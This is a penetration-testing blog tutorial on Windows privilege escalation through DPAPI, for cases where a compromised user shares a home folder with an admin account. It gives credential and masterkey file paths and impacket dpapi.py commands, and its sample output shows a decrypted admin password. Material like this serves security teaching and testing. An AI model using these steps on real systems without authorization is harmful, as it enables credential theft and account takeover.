Skip to main content

Privilege Escalation via DPAPI

··672 words·4 mins
Red Team Security Windows
Table of Contents

What’s DPAPI?
#

DPAPI stands for Data Protection API. It’s a Windows-specific API that provides services for encrypting and decrypting data using keys tied to a user or machine account. Essentially, it lets applications protect sensitive data (like passwords, connection strings, private keys) without needing to manage encryption keys directly.

When you protect data with DPAPI under a user account, only that Windows user (after logging in) can decrypt it. The underlying mechanism relies on the user’s login credentials and Windows cryptographic services to generate and safeguard the encryption keys. Typical usages include:

  • Storing credentials in applications
  • Protecting private keys (e.g., in certificate stores)
  • Encrypting configuration files

Why you should care?
#

DPAPI can be useful in situations when you got an initial foothold on a Windows host and are seeking to escalate your privileges. More specifically, we are talking a scenarios where your initial access user shares their home folder with a privileged account. This is a setup that is commonly found in Active Directory contexts, when a single person is operating with 2 distinct users, 1 for their everyday work and another one for dedicated administrative actions such as managing other users & groups that required elevated privileges. This is done to adhere to the principle of least privilege and to reduce the attack surface in case the everyday user is compromised.

However, if this is undermined by sharing a home folder under C:\Users\<name>, that opens up the door for privilege escalation if the user gets compromised.

⚠️ Disclaimer: This post is for educational and ethical purposes only. It’s meant to help readers understand penetration testing and improve security. Do not use these techniques without explicit permission from the system owner. Unauthorized access or tampering is illegal, and the author is not responsible for misuse.

How to exploit?
#

I’m on a MacOS machine, so my choice for interacting with DPAPI is the dpapi.py script from impacket. If not yet part of your toolchain, find impacket here. This will aid you in extracting keys and passwords offline.

While the location of the actual secrets file can vary depending on the application using the DPAPI interface, in my case, I found one at C:\Users\<name>\AppData\Roaming\Microsoft\Credentials.

If permissions somehow give you a hard time copying either the secret or masterkey file to your local machine, just utilize the old base64 trick: base64-encode the respective file on the target machine, copy the generated payload from the console and decode again on your local machine.

masterkey
#

To get credentials out of the dpapi file, you first need to extract the respective masterkey. To aquire the masterkey, you need the masterkey file and the SID of the user whose password you want to extract. The masterkey file can be located under C:\Users\<name>\AppData\Roaming\Microsoft\Protect. If you don’t yet know the SID of the user in question (from bloodhound reconnaissance e.g.), the folder where the masterkey is located actually is the SID of the user. Then use the masterkey command to extract it:

dpapi.py masterkey \
	-file ~/tmp/9f3d8c64-5e41-4c2d-9b7a-8c2f45a7d219 \
	-sid 'S-1-5-21-3623811015-3361044348-30300820-1013'

After being prompted for the initial user’s password, you will be greeted with the masterkey readily available:

Impacket v0.13.0.dev0+20250820.203717.835623ae - Copyright Fortra, LLC and its affiliated companies

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 9f3d8c64-5e41-4c2d-9b7a-8c2f45a7d219
Flags       :        0 (0)
Policy      : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Password:
Decrypted key with User Key (MD4 protected)
Decrypted key: 0x4f7a2b8c91d5e3f6a7b8c9d0e1f2a3b4c5d6e7f8910a1b2c3d4e5f60718293a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7081920a1b2c3d4e5f6

credential
#

With the key at hand you can immediately provide it to the credential command of dpapi.py to complete decryption:

dpapi.py credential \
	-file ~/tmp/7FA3C2184E1D4F7A9B8E23CDA6F52D4C \
	-key '0x4f7a2b8c91d5e3f6a7b8c9d0e1f2a3b4c5d6e7f8910a1b2c3d4e5f60718293a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7081920a1b2c3d4e5f6'

And voila, just like that you found another user`s password and can escalate your privileges!

Impacket v0.13.0.dev0+20250820.203717.835623ae - Copyright Fortra, LLC and its affiliated companies

[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29+00:00
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=FIGGO.LA
Description :
Unknown     :
Username    : ali.mcsnitcherson_admin
Unknown     : bestMuddaf***inGoddamnPasswordEv444!

Fin

That’s it for today and don’t forget kids:

🔥 Nobody get Pen’ned without the Consent!